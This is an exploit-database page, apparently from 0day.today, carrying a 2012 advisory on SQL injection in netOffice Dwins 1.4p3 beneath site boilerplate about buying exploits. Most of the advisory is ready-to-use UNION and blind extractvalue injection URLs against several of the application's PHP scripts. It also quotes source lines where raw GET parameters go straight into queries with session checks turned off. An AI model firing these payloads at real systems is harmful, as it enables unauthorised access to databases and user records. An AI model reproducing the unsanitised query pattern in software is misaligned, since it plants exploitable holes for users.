0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
netOffice Dwins <= 1.4p3 SQL Injection Vulnerability
[ Discovered by dun \ posdub[at]gmail.com ] [ 2012-11-08 ] ################################################################# # [ netOffice Dwins <= 1.4p3 ] SQL Injection Vulnerability # ################################################################# # # Script: "netOffice Dwins is a free web based time tracking, timesheet, # content management, issue tracking, and project management environment." # # Vendor: http://sourceforge.net/projects/netofficedwins/ # Download: http://sourceforge.net/projects/netofficedwins/files/netofficedwins/1.4p3/ # ################################################################# # [SQL Injection] # # reports/export_leaves.php?S_ATSEL=-1) union select 0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0-- # File: reports/export_leaves.php ( lines: 16-107 ): # ..cut.. # $S_mem = $_GET['S_ATSEL']; //1 # ..cut.. # $checkSession = false; //2 # require_once("../includes/library.php"); # ..cut.. # $query .= " AND wkh.owner IN($S_mem)"; //3 # ..cut.. # $tmpquery = "$query ORDER BY wkh.owner"; //4 # $listWorkHours = new request(); # $listWorkHours->openWorkHours($tmpquery); //5 SQL # ..cut.. # # users/exportuser.php?id=-1 union select 0,0,0,0,0,1,1,1,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0-- # File: users/exportuser.php ( lines: 15-21 ): # ..cut.. # $checkSession = false; //1 # require_once("../includes/library.php"); # require_once("../includes/vcard.class.php"); # $id = $_GET['id']; //2 # $tmpquery = " WHERE mem.id=$id"; //3 # $userDetail = new request(); # $userDetail->openMembers($tmpquery); //4 SQL # ..cut.. # # reports/export_person_performance.php?S_ATSEL=-1) union select 0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0-- # expenses/approveexpense.php?id=-1 union select 0,0,0,0,1,1,0,0,0,0,1,1,0,0,1,0,0,0,0,0--&auth=1&doc=-1 union select 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- # calendar/exportcalendar.php?id=-1' union select 0,0,0,1,1,0,1,1,0,0,0,0,0,0,0,0,1-- # # [Blind SQL Injection] # # analysis/expanddimension.php?id=-1' union select 0,0,0,0,0,0,0,0,0,0,extractvalue(1,concat(0x2e,(SELECT @@version)))-- # analysis/changedimensionsortingorder.php?id=-1' union select 0,0,0,0,0,0,0,0,0,0,extractvalue(1,concat(0x2e,(SELECT @@version)))-- # ### [ dun / 2012 ] ############################################# # 0day.today [2024-11-15] #